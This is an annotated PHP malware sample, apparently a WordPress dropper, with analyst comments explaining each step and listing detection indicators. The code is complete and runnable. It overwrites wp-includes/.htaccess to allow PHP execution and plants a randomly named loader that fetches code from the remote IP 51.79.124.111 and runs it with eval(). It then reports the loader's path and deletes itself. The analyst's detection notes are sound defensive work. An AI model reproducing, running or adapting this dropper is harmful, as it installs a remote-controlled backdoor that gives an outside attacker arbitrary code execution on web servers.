File: /var/www/html/hinfofuns.php
<?php
// Analyst note: turns on full error reporting and prints errors into the HTTP
// response, so whoever requests this script sees any PHP warning or failure
// directly in the page output.
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
/**
 * Returns $length random bytes as a raw binary string.
 *
 * Picks the first generator available: random_bytes() (PHP 7+), then
 * openssl_random_pseudo_bytes(), then a byte-by-byte loop over mt_rand().
 * The fallback chain presumably exists so the script runs on old PHP builds.
 * In this file the result is only used to build a file name, not a secret.
 *
 * @param int $length Number of bytes to produce (default 5).
 * @return string Raw bytes; the caller hex-encodes them.
 */
function getRandomBytes($length = 5) {
if (function_exists('random_bytes')) {
return random_bytes($length);
} elseif (function_exists('openssl_random_pseudo_bytes')) {
return openssl_random_pseudo_bytes($length);
} else {
// Last resort: mt_rand() is not a cryptographic generator, so names produced
// on this path are predictable in principle.
$bytes = '';
for ($i = 0; $i < $length; $i++) {
$bytes .= chr(mt_rand(0, 255));
}
return $bytes;
}
}
// Analyst summary of this statement run: it plants a small PHP loader under
// <docroot>/wp-includes, rewrites that directory's .htaccess so .php files are
// reachable, prints the loader's path to the requester, then deletes itself.

// Target directory is derived from the web server's document root. The variable
// is named "wpContentPath" but the path it holds is wp-includes.
$rootPath = $_SERVER["DOCUMENT_ROOT"];
$wpContentPath = $rootPath . DIRECTORY_SEPARATOR . "wp-includes";
// Creates wp-includes (recursively, mode 0755) when it is missing, so the script
// does not depend on a WordPress install being present at the document root.
if (!is_dir($wpContentPath)) {
if (!mkdir($wpContentPath, 0755, true)) {
die("Failed to create wp-includes directory");
}
}
// Any existing wp-includes/.htaccess is deleted (errors suppressed by @) and
// replaced below. Rules that were in the old file, including any that blocked
// direct PHP execution in this directory, are lost.
// Detection: a changed or newly created .htaccess in wp-includes.
$htaccessPath = $wpContentPath . DIRECTORY_SEPARATOR . '.htaccess';
if (file_exists($htaccessPath)) {
@unlink($htaccessPath);
}
// The replacement uses Apache 2.2-style Order/Allow directives to allow requests
// to every file ending in .php in this directory.
$htaccessContent = <<<HTACCESS
<FilesMatch "\.php$">
Order allow,deny
Allow from all
</FilesMatch>
HTACCESS;
// Return value is not checked: a failed write here is silent.
file_put_contents($htaccessPath, $htaccessContent);
// File name is 5 random bytes hex-encoded: 10 lowercase hex characters + ".php".
// Detection: files matching that shape in wp-includes that are not part of the
// WordPress core file list (compare against core checksums).
$randomName = bin2hex(getRandomBytes(5)) . '.php';
$fullFilePath = $wpContentPath . DIRECTORY_SEPARATOR . $randomName;
// The dropped file is a loader, not the payload: on every request it fetches the
// body at the hard-coded plain-HTTP URL with cURL and passes it to eval(). The
// executed code is therefore chosen by the remote server at request time and is
// never stored on disk, so scanning the dropped file only reveals this stub.
// Indicators on the page: host 51.79.124.111, path /mail2, and the
// curl_exec() -> eval("?>" . ...) pattern. Outbound HTTP from the web server
// process to that host is the network-side signal.
$phpCode = '<?php $url = "http://51.79.124.111/mail2";$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$tag= curl_exec($ch);curl_close($ch);eval("?>" . ("$tag"));?>';
if (file_put_contents($fullFilePath, $phpCode) === false) {
die("Failed to write PHP file");
}
// Reports the relative path of the dropped loader in the HTTP response. The
// literal marker "Testwow" is part of that response body.
echo "Testwow<br>wp-includes/$randomName</br>";
// Self-deletion: removes this script via __FILE__ and again via the relative
// name "hinfofuns.php" (resolved against the current working directory).
// After a successful run the dropper is gone from disk; evidence of it remains
// in web access logs (a request for hinfofuns.php) and in the artefacts above.
@unlink(__FILE__);
@unlink("hinfofuns.php");
?>